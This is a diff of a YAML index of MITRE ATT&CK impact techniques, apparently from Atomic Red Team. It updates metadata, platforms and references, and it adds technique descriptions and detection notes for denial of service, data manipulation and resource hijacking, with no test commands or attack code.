-      - kill_chain_name: mitre-attack
-        phase_name: impact
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'File: File Modification'
-      - 'File: File Creation'
-      - 'File: File Deletion'
-      x_mitre_impact_type:
-      - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1489:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
-      created: '2019-03-29T19:00:55.901Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1489
-        url: https://attack.mitre.org/techniques/T1489
-      - source_name: SecureWorks WannaCry Analysis
-        url: https://www.secureworks.com/research/wcry-ransomware-analysis
-        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
-          Analysis. Retrieved March 26, 2019.
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Novetta Blockbuster
-        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
-        description: 'Novetta Threat Research Group. (2016, February 24). Operation
-          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
-          25, 2016.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-12T15:57:27.380Z'
+      name: Service Stop
       description: "Adversaries may stop or disable services on a system to render
         those services unavailable to legitimate users. Stopping critical services
         or processes can inhibit or stop response to an incident or aid in the adversary's
         overall objectives to cause damage to the environment.(Citation: Talos Olympic
         Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
         this by disabling individual services of high importance to an organization,
-        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible
-        (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
-        many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible.(Citation:
+        Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+        all services to render systems unusable.(Citation: Talos Olympic Destroyer
         2018) Services or processes may not allow for modification of their data stores
         while running. Adversaries may stop services or processes in order to conduct
         [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
         for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
         of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Service Stop
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
 
@@ -57139,10 +57894,14 @@ impact:
         Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
 
         Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, <code>ChangeServiceConfigW</code> may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Process: Process Termination'
@@ -57153,39 +57912,37 @@ impact:
       - 'Service: Service Metadata'
       x_mitre_impact_type:
       - Availability
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+      created: '2019-03-29T19:00:55.901Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1489
+        external_id: T1489
+      - source_name: SecureWorks WannaCry Analysis
+        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+          Analysis. Retrieved March 26, 2019.
+        url: https://www.secureworks.com/research/wcry-ransomware-analysis
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Novetta Blockbuster
+        description: 'Novetta Threat Research Group. (2016, February 24). Operation
+          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+          25, 2016.'
+        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1489
     atomic_tests: []
   T1499.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
-      type: attack-pattern
-      created: '2020-02-20T15:37:27.052Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1499.004
-        url: https://attack.mitre.org/techniques/T1499/004
-      - source_name: Sucuri BIND9 August 2015
-        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
-        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
-          in the Wild. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T15:42:23.001Z'
       name: Application or System Exploitation
       description: "Adversaries may exploit software vulnerabilities that can cause
         an application or system to crash and deny availability to users. (Citation:
@@ -57203,13 +57960,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Attacks targeting web applications may generate logs in the
         web server, application server, and/or database server that can be used to
         identify the type of attack. Externally monitor the availability of services
         that may be targeted by an Endpoint DoS.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -57217,36 +57981,27 @@ impact:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1565.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
       type: attack-pattern
-      created: '2020-03-02T14:30:05.252Z'
+      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+      created: '2020-02-20T15:37:27.052Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.003
-        url: https://attack.mitre.org/techniques/T1565/003
-      - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-        url: https://content.fireeye.com/apt/rpt-apt38
-        source_name: FireEye APT38 Oct 2018
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1499/004
+        external_id: T1499.004
+      - source_name: Sucuri BIND9 August 2015
+        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+          in the Wild. Retrieved April 26, 2019.
+        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1565.003:
+    technique:
+      modified: '2024-10-15T18:21:43.760Z'
       name: Runtime Data Manipulation
       description: |-
         Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
@@ -57255,11 +58010,17 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Inspect important application binary file hashes, locations,
         and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'File: File Deletion'
@@ -57268,17 +58029,31 @@ impact:
       - 'File: File Creation'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - root
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+      created: '2020-03-02T14:30:05.252Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/003
+        external_id: T1565.003
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1498.002:
     technique:
-      modified: '2023-03-30T21:01:41.052Z'
+      modified: '2024-10-15T16:04:34.495Z'
       name: Reflection Amplification
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
@@ -57287,6 +58062,7 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
         before the traffic volume is sufficient to cause impact to the availability
         of the service, but such response time typically requires very aggressive
@@ -57302,17 +58078,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Sensor Health: Host Status'
       - 'Network Traffic: Network Traffic Flow'
@@ -57322,14 +58093,15 @@ impact:
       id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
       created: '2020-03-02T20:08:03.691Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1498/002
         external_id: T1498.002
-      - source_name: Cloudflare ReflectionDoS May 2017
-        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
-          (attacks). Retrieved April 23, 2019.
-        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       - source_name: Cloudflare DNSamplficationDoS
         description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
           April 23, 2019.
@@ -57338,28 +58110,28 @@ impact:
         description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
           April 23, 2019.
         url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+      - source_name: Cloudflare ReflectionDoS May 2017
+        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+          (attacks). Retrieved April 23, 2019.
+        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cloudflare Memcrashed Feb 2018
+        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
       - source_name: Arbor AnnualDoSreport Jan 2018
         description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
           Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
           into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
           Infrastructure Security Report. Retrieved April 22, 2019.
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-      - source_name: Cloudflare Memcrashed Feb 2018
-        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
-          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
-        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
-      - source_name: Cisco DoSdetectNetflow
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1499.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:05:48.014Z'
       name: Service Exhaustion Flood
       description: |-
         Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
@@ -57370,7 +58142,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -57381,17 +58152,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -57428,7 +58194,8 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491:
     technique:
@@ -57449,7 +58216,7 @@ impact:
       - source_name: mitre-attack
         external_id: T1491
         url: https://attack.mitre.org/techniques/T1491
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:42.056Z'
       name: Defacement
       description: "Adversaries may modify visual content available internally or
         externally to an enterprise network, thus affecting the integrity of the original
@@ -57476,12 +58243,78 @@ impact:
       x_mitre_impact_type:
       - Integrity
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+    atomic_tests: []
+  T1496.002:
+    technique:
+      modified: '2024-09-25T14:59:35.287Z'
+      name: Bandwidth Hijacking
+      description: "Adversaries may leverage the network bandwidth resources of co-opted
+        systems to complete resource-intensive tasks, which may impact system and/or
+        hosted service availability. \n\nAdversaries may also use malware that leverages
+        a system's network bandwidth as part of a botnet in order to facilitate [Network
+        Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+        to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+        in proxyjacking by selling use of the victims' network bandwidth and IP address
+        to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+        in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+        Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+        financial costs or availability disruptions, this technique may cause reputational
+        damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+        Proxyjacking)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      - IaaS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'File: File Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Connection Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+      created: '2024-09-25T13:44:35.412Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/002
+        external_id: T1496.002
+      - source_name: Sysdig Proxyjacking
+        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+          Chat. Retrieved July 6, 2023.
+        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+      - source_name: Unit 42 Leaked Environment Variables 2024
+        description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+          Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+          Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+        url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+      - source_name: GoBotKR
+        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1657:
     technique:
-      modified: '2024-04-11T20:22:14.359Z'
+      modified: '2024-10-15T15:58:10.254Z'
       name: Financial Theft
       description: "Adversaries may steal monetary resources from targets through
         extortion, social engineering, technical theft, or other methods aimed at
@@ -57514,7 +58347,7 @@ impact:
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
       - Pawel Partyka, Microsoft Threat Intelligence
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -57524,10 +58357,9 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
@@ -57590,7 +58422,6 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1491.001:
     technique:
@@ -57631,7 +58462,7 @@ impact:
         messages. Since internally defacing systems exposes an adversary''s presence,
         it often takes place after other intrusion goals have been accomplished.(Citation:
         Novetta Blockbuster Destructive Malware)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-28T18:55:35.988Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Defacement: Internal Defacement'
       x_mitre_detection: Monitor internal and websites for unplanned content changes.
@@ -57652,9 +58483,157 @@ impact:
       - Integrity
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1491.001
     atomic_tests: []
+  T1496.004:
+    technique:
+      modified: '2024-10-16T17:59:27.535Z'
+      name: Cloud Service Hijacking
+      description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+        applications to complete resource-intensive tasks, which may impact hosted
+        service availability. \n\nFor example, adversaries may leverage email and
+        messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+        Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+        spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+        messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+        2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+        in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+        AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+        2024)\n\nIn some cases, adversaries may leverage services that the victim
+        is already using. In others, particularly when the service is part of a larger
+        cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+        2024) Leveraging SaaS applications may cause the victim to incur significant
+        financial costs, use up service quotas, and otherwise impact availability. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+      created: '2024-09-25T14:05:59.910Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/004
+        external_id: T1496.004
+      - source_name: SentinelLabs SNS Sender 2024
+        description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+          Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+        url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+      - source_name: Lacework LLMJacking 2024
+        description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+          with Composite Alerts. Retrieved September 25, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+      - source_name: Sysdig LLMJacking 2024
+        description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+          (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+      - source_name: Permiso SES Abuse 2023
+        description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+          25, 2024.
+        url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.001:
+    technique:
+      modified: '2024-10-13T16:58:38.820Z'
+      name: Compute Hijacking
+      description: "Adversaries may leverage the compute resources of co-opted systems
+        to complete resource-intensive tasks, which may impact system and/or hosted
+        service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        is to validate transactions of cryptocurrency networks and earn virtual currency.
+        Adversaries may consume enough system resources to negatively impact and/or
+        cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+        Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+        because of the high potential for available resources, but user endpoint systems
+        may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+        environments may also be targeted due to the ease of deployment via exposed
+        APIs and the potential for scaling mining activities by deploying or compromising
+        multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+        Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+        cryptocurrency mining malware identify then kill off processes for competing
+        malware to ensure it’s not competing for resources.(Citation: Trend Micro
+        War of Crypto Miners)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Network Traffic: Network Connection Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Sensor Health: Host Status'
+      - 'Process: Process Creation'
+      - 'File: File Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+      created: '2024-09-25T13:34:30.100Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/001
+        external_id: T1496.001
+      - source_name: Unit 42 Hildegard Malware
+        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+      - source_name: CloudSploit - Unused AWS Regions
+        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+          Retrieved October 8, 2019.
+        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
